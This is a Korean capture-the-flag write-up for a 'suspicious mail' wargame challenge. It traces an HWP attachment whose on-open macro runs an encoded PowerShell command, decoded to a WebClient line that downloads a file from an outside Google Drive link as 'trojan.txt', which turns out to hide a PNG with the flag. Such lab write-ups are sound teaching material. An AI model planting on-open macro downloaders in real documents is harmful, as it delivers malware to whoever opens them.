[N0Named Wargame] 수상한 메일

3팀 김소희

 

 

 

 

 문제를 클릭하면 아래와 같은 화면이 나온다.

 

 

 

 

파일을 다운로드 받았더니 텍스트파일과 첨부파일 폴더가 보인다.

 

 

 

 

 

 

메일내용을 열어보았는데 별 내용은 없다.

 

 

 

 

그래서 첨부파일 폴더안에 제출용 한글파일을 열어보았다.

 

 

열어보았더니 스크립트 코드가 포함되어있다고 실행하겠냐는 문구가 보인다.

 

 

 

 

 

실행을 눌렀더니 설정에서 보안 수준을 보통이나 낮음으로 설정하라고 해서

보통으로 바꿔주었다.

 

 

 

한글파일 내용도 평범하길래 매크로 실행을 해보려했는데

 

도구 - 스크립트 매크로 - 매크로 실행

 

 

 

 

코드 편집이 있길래 눌러보았다.

 

 

 

 

ScriptMacro에는 별다른 내용이 없어 Document로 바꾸었다.

 

 

 

그랬더니 OnDocument_Open()함수에

원래는 //todo : 라고 아무내용도 없는데 Try-Catch문이 있었다.

 

 

 

-enc 다음에 오는 문자들을 실행시키는 코드인것 같아서

그 문자들을 해석하기 위해 아스키 코드로 바꾸어 보았다.

(문자들은 Base64에 넣어주었다.)

https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html

 

 

 

아래와 같은 코드가 나와서 링크로 들어가 보았다.

https://drive.google.com/open?id=1aHPKrc38KgYipYVrDuKqkZYv8Zg7VbYu

(New-Object Net.WebClient).DownloadFile('https://drive.google.com/open?id=1aHPKrc38KgYipYVrDuKqkZYv8Zg7VbYu', 'trojan.txt'); #i know.. it is wrong.. but understand it plz:) goto next step https://drive.google.com/open?id=1aHPKrc38KgYipYVrDuKqkZYv8Zg7VbYu

 

 

 

 

 

trojan.txt파일이 나왔는데 또 알수없는 문자들이 있길래 한번 더 아스키 코드로 바꾸었다.

 

 

 

 

 

그랬더니 아스키 코드에  

89 50 4E 47 0D 0A 1A 0A라는 png 파일 시그니처가 보여서 HxD에 넣어보았다.

 

 

 

 

 

HxD에 넣어서 보니 예상대로 PNG파일이었다.

 

 

 

 

 

그래서 .png로 저장해주었더니 플래그가 나왔다.

 

Flag : NND{YOU_CAN_WORK_HERE!>.<}